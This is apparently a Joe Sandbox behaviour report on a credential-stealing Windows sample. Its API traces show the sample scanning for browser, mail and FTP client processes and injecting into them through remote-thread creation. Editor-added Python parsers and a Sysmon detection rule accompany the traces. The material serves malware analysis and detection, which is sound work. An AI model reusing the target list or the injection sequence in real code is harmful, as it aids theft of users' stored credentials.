  - 861eb6 / 861f4a: lstrlen, heap allocation, lstrcat (twice), 8622b8 (lstrlen twice), 8627e2 (lstrlen, MultiByteToWideChar), RtlZeroMemory, 8622e5 (DnsQuery_W, DnsFree, inet_ntoa), wsprintfW (twice), 862815 (VirtualAlloc), RtlMoveMemory, 862843 (three API calls).
  - 861493: 8617c7 (lstrlen, heap allocation, RtlMoveMemory), 861647 (lstrlen, getpeername, inet_ntoa, htons, wsprintfA), 861752 (GetModuleHandleA, GetProcAddress, RtlZeroMemory four times), 862404 (lstrlen, CryptStringToBinaryA twice), 8615e0.
  - Stand-alone: 86245e (lstrlen, CryptBinaryToStringA twice), 867728 (LoadLibraryA, GetProcAddress, VirtualProtect twice), 862806 (VirtualFree).

Callgraph

• Rendered callgraph not preserved in this extraction. 44 functions, Function_00861000 through Function_00867728. Function_00861000 enters Function_00861016, which calls 00862608, 00862592, 00861819, 008610A4, 00862861, 008625AD, 00861332, 00862573 and 00862731; Function_00861819 calls 00861A80, 00862608 and 00861B17; Function_00861332 calls 00862843, 00862608, 008624D5, 00861493, 00861DE3, 00862861 and 0086263E; Function_00861493 calls 00861647, 008617C7, 00862404, 00861752, 008626E6 and 008615E0; Function_00861DE3 calls 00861DC0, 00862815, 00861E93 and 00861E5D.

Control-flow Graph

• Rendered graph not preserved in this extraction. Basic blocks 861016-86132d: the entry calls 862608, allocates through 862861 and copies with RtlMoveMemory, reads GetCurrentProcessId, then calls 861332 and 8610a4 before entering the loop at 8610dc: CreateToolhelp32Snapshot, Process32First, and a chain of lstrcmpiA compares against the image names listed below (86110c-86127a). A match leads through 861280-861300: calls to 8625ad, 862592, 862573 and 862608, one more lstrcmpiA, then 862731, 861819 and 862731 again. Process32Next (861305) re-enters the compare chain; at the end of the list CloseHandle (86131b) and Sleep (861322) loop back to the snapshot.
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00862608: VirtualQuery.KERNEL32(00864434,?,0000001C), ref: 00862615
                                                                                                                                                        • Part of subcall function 00862861: GetProcessHeap.KERNEL32(00000008,0000A000,008610CC), ref: 00862864
                                                                                                                                                        • Part of subcall function 00862861: RtlAllocateHeap.NTDLL(00000000), ref: 0086286B
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00861038
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0086106B
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00861074
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00861010), ref: 0086107A
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008610DF
                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 008610FE
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0086111A
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0086112E
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00861142
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00861156
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00861166
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0086117A
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0086118E
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 008611A2
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 008611B6
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 008611CA
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 008611DE
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 008611F2
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00861206
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00861216
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00861226
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00861236
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00861246
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00861256
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00861266
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00861276
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 008612B4
                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0086130B
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0086131C
                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00861327
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                                                                      • String ID: 0-vwP,vw$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                                      • API String ID: 2555639992-2454475726
                                                                                                                                                      • Opcode ID: b2b2a65f38b0715b7f5e60881aab4e9a7dc857a476a256ea6652769436928e1d
                                                                                                                                                      • Instruction ID: b1a50f89470fe7dcf20d09b68f8fd97ce85cc637c6b43f21e3ed03b9a3d53381
                                                                                                                                                      • Opcode Fuzzy Hash: b2b2a65f38b0715b7f5e60881aab4e9a7dc857a476a256ea6652769436928e1d
                                                                                                                                                      • Instruction Fuzzy Hash: 7071C230A01305ABCF00DBB19D59E6E7BACFF45B80F0A1529F941C7392EF65DA098B65

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00862861: GetProcessHeap.KERNEL32(00000008,0000A000,008610CC), ref: 00862864
                                                                                                                                                        • Part of subcall function 00862861: RtlAllocateHeap.NTDLL(00000000), ref: 0086286B
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008610DF
                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 008610FE
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0086111A
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0086112E
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00861142
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00861156
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00861166
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0086117A
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0086118E
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 008611A2
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 008611B6
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 008611CA
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 008611DE
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 008611F2
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00861206
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00861216
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00861226
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00861236
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00861246
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00861256
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00861266
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00861276
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 008612B4
                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0086130B
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0086131C
                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00861327
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                                                                                      • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                                      • API String ID: 3950187957-1680033604
                                                                                                                                                      • Opcode ID: af0e10a5ef2fd3a236aa0db62baec8e60b2ba602f80e2b8c89d600e0a0cb3a8b
                                                                                                                                                      • Instruction ID: a79706b0cb377e06b6b122ed301d050da19a127c5097160e511a2ec30d7b6898
                                                                                                                                                      • Opcode Fuzzy Hash: af0e10a5ef2fd3a236aa0db62baec8e60b2ba602f80e2b8c89d600e0a0cb3a8b
                                                                                                                                                      • Instruction Fuzzy Hash: 23519330A05305A6CF40DBB19D49E6E7AACFE45B80F0A0529FA41C7381EF69DA098B75
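The record above is the sample's process scan: one TH32CS_SNAPPROCESS snapshot, a Process32First/Process32Next walk, a case-insensitive lstrcmpiA against each hard-coded browser, mail and FTP client image name, then a one-second Sleep before the next pass. The following parser is an added example written for this page; it is not Joe Sandbox code and not part of the sample. It reads the "APIs" lines in the exact shape the report prints them, extracts the lstrcmpiA targets and the snapshot and sleep constants, and checks that the comparison set agrees with the record's own "String ID" summary. The listing embedded in the block is copied from the record above with the leading whitespace removed; the TH32CS_* names are the documented Toolhelp flag values.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function record and cross-check
the process-name scan against the record's own 'String ID' summary.
Added example by the editor, not part of the report or the sample."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Copied from the process-enumeration record above (leading whitespace removed).
LISTING = """\
• Part of subcall function 00862861: GetProcessHeap.KERNEL32(00000008,0000A000,008610CC), ref: 00862864
• Part of subcall function 00862861: RtlAllocateHeap.NTDLL(00000000), ref: 0086286B
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008610DF
• Process32First.KERNEL32(00000000,?), ref: 008610FE
• lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0086111A
• lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0086112E
• lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00861142
• lstrcmpiA.KERNEL32(?,opera.exe), ref: 00861156
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00861166
• lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0086117A
• lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0086118E
• lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 008611A2
• lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 008611B6
• lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 008611CA
• lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 008611DE
• lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 008611F2
• lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00861206
• lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00861216
• lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00861226
• lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00861236
• lstrcmpiA.KERNEL32(?,263em.exe), ref: 00861246
• lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00861256
• lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00861266
• lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00861276
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 008612B4
• Process32Next.KERNEL32(00000000,00000128), ref: 0086130B
• CloseHandle.KERNELBASE(00000000), ref: 0086131C
• Sleep.KERNELBASE(000003E8), ref: 00861327
"""
STRING_ID_LINE = ("• String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe"
                  "$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe"
                  "$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe"
                  "$thebat64.exe$thunderbird.exe$winscp.exe")

# "• [Part of subcall function X: ]Api.MODULE(args), ref: ADDR"; wsprintfA lines carry no argument list.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\),)?\s*ref: (?P<ref>[0-9A-Fa-f]+)\s*$")

# Toolhelp snapshot flags (tlhelp32.h); the record passes 00000002.
TH32CS_FLAGS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS",
                0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE", 0x10: "TH32CS_SNAPMODULE32"}

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # callee address when the line is "Part of subcall"

def parse_listing(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m["args"].split(",") if m["args"] else []
        sub = int(m["subfn"], 16) if m["subfn"] else None
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), sub))
    return calls

def compare_targets(calls):
    """Second argument of each lstrcmpiA: the image names the loop is looking for."""
    return [c.args[1] for c in calls if c.api == "lstrcmpiA" and len(c.args) > 1]

def string_id_names(line: str):
    body = line.split("String ID:", 1)[1]
    return {s.strip() for s in body.split("$") if s.strip()}

def decode_snapshot_flags(value: int):
    return [name for bit, name in TH32CS_FLAGS.items() if value & bit]

def summarize(calls):
    snap = next(c for c in calls if c.api == "CreateToolhelp32Snapshot")
    sleep = next(c for c in calls if c.api == "Sleep")
    targets = compare_targets(calls)
    return {
        "calls": len(calls),
        "subcalls": sum(c.subcall_of is not None for c in calls),
        "snapshot_flags": decode_snapshot_flags(int(snap.args[0], 16)),
        "sleep_ms": int(sleep.args[0], 16),
        "compares": len(targets),          # 21 calls: microsoftedgecp.exe is compared twice
        "unique_targets": sorted(set(targets)),
    }

if __name__ == "__main__":
    calls = parse_listing(LISTING)
    summary = summarize(calls)
    print(summary)
    diff = set(summary["unique_targets"]) ^ string_id_names(STRING_ID_LINE)
    print("disagreement with String ID:", sorted(diff) or "none")
```

The same regex handles the other records on this page, including the "Part of subcall function" lines, so the parsed call list can be diffed between two analyses of related samples instead of comparing fuzzy hashes by eye.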

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Control-flow graph (rendered image not preserved in this extraction): 55 basic blocks covering 867728-86790a. API-bearing blocks are 86785a-867870 (LoadLibraryA), 867883-867890 (GetProcAddress) and 8678d0-867900 (VirtualProtect, called twice); the edges 163->165->156->159->163 close a loop through the GetProcAddress block.
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000866000.00000040.80000000.00040000.00000000.sdmp, Offset: 00866000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_866000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f8b0e2d835fbf4249adab1026835ccdef6387420e166c4edad27edcaa179ae79
                                                                                                                                                      • Instruction ID: 9df2065add90cc04901ec8cf4bf9b2c0ba3869cae7ff72d666776876091a780e
                                                                                                                                                      • Opcode Fuzzy Hash: f8b0e2d835fbf4249adab1026835ccdef6387420e166c4edad27edcaa179ae79
                                                                                                                                                      • Instruction Fuzzy Hash: 2951297195D3964FD7218A78CC847B07BA0FB52329B2A0679C5E5CB3C2E7985C09C7E4

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Control-flow graph: a single basic block, 862861-862871 (GetProcessHeap, RtlAllocateHeap).
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000A000,008610CC), ref: 00862864
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0086286B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                                      • Opcode ID: e88a70ec2e05e73dad1fc9e7b6be3bb9759f8e990682803e0812248e0a9f46a1
                                                                                                                                                      • Instruction ID: 9ae58ad3e1c44a4b00c18c348081ac3f5998b6b4bb0c30e6c681d4ac0abb00ca
                                                                                                                                                      • Opcode Fuzzy Hash: e88a70ec2e05e73dad1fc9e7b6be3bb9759f8e990682803e0812248e0a9f46a1
                                                                                                                                                      • Instruction Fuzzy Hash: E2A012704005407FDD4017A0AC0DF053A19B740301F011000F10AC4060C9E0014C8B23

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00862608: VirtualQuery.KERNEL32(00864434,?,0000001C), ref: 00862615
                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,771AE800,microsoftedgecp.exe,?), ref: 0086184E
                                                                                                                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00861889
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00861919
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00863428,00000016), ref: 00861940
                                                                                                                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00861968
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00861978
                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00861992
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0086199A
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 008619A8
                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 008619AF
                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 008619C5
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 008619CC
                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 008619E2
                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00861A0C
                                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00861A1F
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00861A26
                                                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00861A2D
                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00861A41
                                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00861A58
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00861A65
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00861A6B
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00861A71
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00861A74
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                                      • String ID: 0-vwP,vw$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                                                                      • API String ID: 1066286714-2883495693
                                                                                                                                                      • Opcode ID: 8f02bf6fb085eebb9f13ba5d874509202cbe75506524549842d5426a6e242cf8
                                                                                                                                                      • Instruction ID: 8d5fc4cf5b59b7659e5f2f3c4ef5b2045e68d91380a231f1e28127eba552aac2
                                                                                                                                                      • Opcode Fuzzy Hash: 8f02bf6fb085eebb9f13ba5d874509202cbe75506524549842d5426a6e242cf8
                                                                                                                                                      • Instruction Fuzzy Hash: 48619C31205314AFD710DF659C88E6BBBECFB89754F060618F949D3292DAB4DE048BA2
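The record above is the injection path into the browser process found by the scan: OpenProcess with 001FFFFF (PROCESS_ALL_ACCESS), NtUnmapViewOfSection, a five-byte ReadProcessMemory/WriteProcessMemory pair at an address resolved through GetModuleHandleA/GetProcAddress in ntdll, CreateRemoteThread, a 500 ms Sleep, a second five-byte write and a second remote thread. On an endpoint this sequence is visible as a Sysmon ProcessAccess event (Event ID 10) carrying the granted access mask, followed by a CreateRemoteThread event (Event ID 8) for the same source and target PID. The correlation below is an added example written for this page, not code from the report or the sample. The events are constructed: Sysmon's field names are used, but the PIDs, timestamps, the thread start address and the Edge content-process path are invented to mirror the explorer.exe to microsoftedgecp.exe case in the listing. Sysmon emits ProcessAccess only when a configuration rule asks for it, and a handle inherited or duplicated rather than opened will not appear as Event ID 10 at all.

```python
"""Correlate Sysmon ProcessAccess (Event ID 10) and CreateRemoteThread
(Event ID 8) records into the open-handle / write / remote-thread sequence
the function above performs. Added example, not part of the report; the
event records are constructed."""
from datetime import datetime, timedelta

# Process access rights (winnt.h). 0x1FFFFF, the value the listing passes to
# OpenProcess, is PROCESS_ALL_ACCESS on Vista and later.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION", 0x2000: "PROCESS_SET_LIMITED_INFORMATION",
    0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC",
    0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
# The least a remote WriteProcessMemory + CreateRemoteThread pair needs on the handle.
INJECT_RIGHTS = 0x0002 | 0x0008 | 0x0020

# Constructed Sysmon records. Field names follow the Sysmon schema; PIDs, times,
# the start address and the image path are invented for the example.
EDGE_CP = r"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EVENTS = [
    {"EventID": 10, "UtcTime": "2025-01-07 10:00:00.100", "SourceProcessId": 4312,
     "SourceImage": r"C:\Windows\explorer.exe", "TargetProcessId": 5100,
     "TargetImage": EDGE_CP, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 8, "UtcTime": "2025-01-07 10:00:00.350", "SourceProcessId": 4312,
     "SourceImage": r"C:\Windows\explorer.exe", "TargetProcessId": 5100,
     "TargetImage": EDGE_CP, "StartAddress": "0x77A31C80",
     "StartModule": r"C:\Windows\SYSTEM32\ntdll.dll", "StartFunction": "atan"},
    # Limited query of chrome.exe with no thread afterwards: not injection.
    {"EventID": 10, "UtcTime": "2025-01-07 10:00:01.000", "SourceProcessId": 900,
     "SourceImage": r"C:\Windows\System32\svchost.exe", "TargetProcessId": 6000,
     "TargetImage": CHROME, "GrantedAccess": "0x1000"},
    # Full-access handle but no remote thread: a candidate for a weaker rule, not this one.
    {"EventID": 10, "UtcTime": "2025-01-07 10:00:02.000", "SourceProcessId": 7000,
     "SourceImage": r"C:\Windows\System32\WerFault.exe", "TargetProcessId": 6000,
     "TargetImage": CHROME, "GrantedAccess": "0x1FFFFF"},
]

def decode_access(mask: int):
    return [name for bit, name in PROCESS_RIGHTS.items() if mask & bit]

def _ts(ev):
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")

def find_injections(events, window=timedelta(seconds=10)):
    """One alert per remote thread whose (source PID, target PID) pair had a
    handle opened with create-thread + VM-write rights within `window` before it."""
    opens = {}
    alerts = []
    for ev in sorted(events, key=_ts):
        key = (ev["SourceProcessId"], ev["TargetProcessId"])
        if ev["EventID"] == 10:
            mask = int(ev["GrantedAccess"], 16)
            if mask & INJECT_RIGHTS == INJECT_RIGHTS:
                opens.setdefault(key, []).append((ev, mask))
        elif ev["EventID"] == 8:
            for op, mask in reversed(opens.get(key, [])):   # most recent handle first
                delay = _ts(ev) - _ts(op)
                if timedelta(0) <= delay <= window:
                    alerts.append({
                        "source": ev["SourceImage"], "target": ev["TargetImage"],
                        "granted": decode_access(mask),
                        "all_access": mask == PROCESS_ALL_ACCESS,
                        "thread_start": f'{ev["StartModule"]}!{ev["StartFunction"]}',
                        "delay_ms": int(delay.total_seconds() * 1000),
                    })
                    break
    return alerts

if __name__ == "__main__":
    for alert in find_injections(EVENTS):
        print(alert)
```

The window is deliberately short: the listing sleeps 500 ms between the two writes, so a handle opened minutes earlier is a different story and should be scored separately. The mask test uses the three rights the write-and-thread pair actually needs rather than equality with PROCESS_ALL_ACCESS, so a loader that requests the minimum is still caught.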

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0086265A
                                                                                                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00862672
                                                                                                                                                      • lstrlen.KERNEL32(?,00000000), ref: 0086267A
                                                                                                                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00862685
                                                                                                                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0086269F
                                                                                                                                                      • wsprintfA.USER32 ref: 008626B6
                                                                                                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 008626CF
                                                                                                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 008626D9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                                      • String ID: %02X
                                                                                                                                                      • API String ID: 3341110664-436463671
                                                                                                                                                      • Opcode ID: 8b590651d36ecde0f10a5a6aee72c7864897552ab8f789ca5fbc76771f17bfa7
                                                                                                                                                      • Instruction ID: 1cb00be3f924e4affc1dd2da8a671558195a3462ee061b85c3fc6ef9ba72309b
                                                                                                                                                      • Opcode Fuzzy Hash: 8b590651d36ecde0f10a5a6aee72c7864897552ab8f789ca5fbc76771f17bfa7
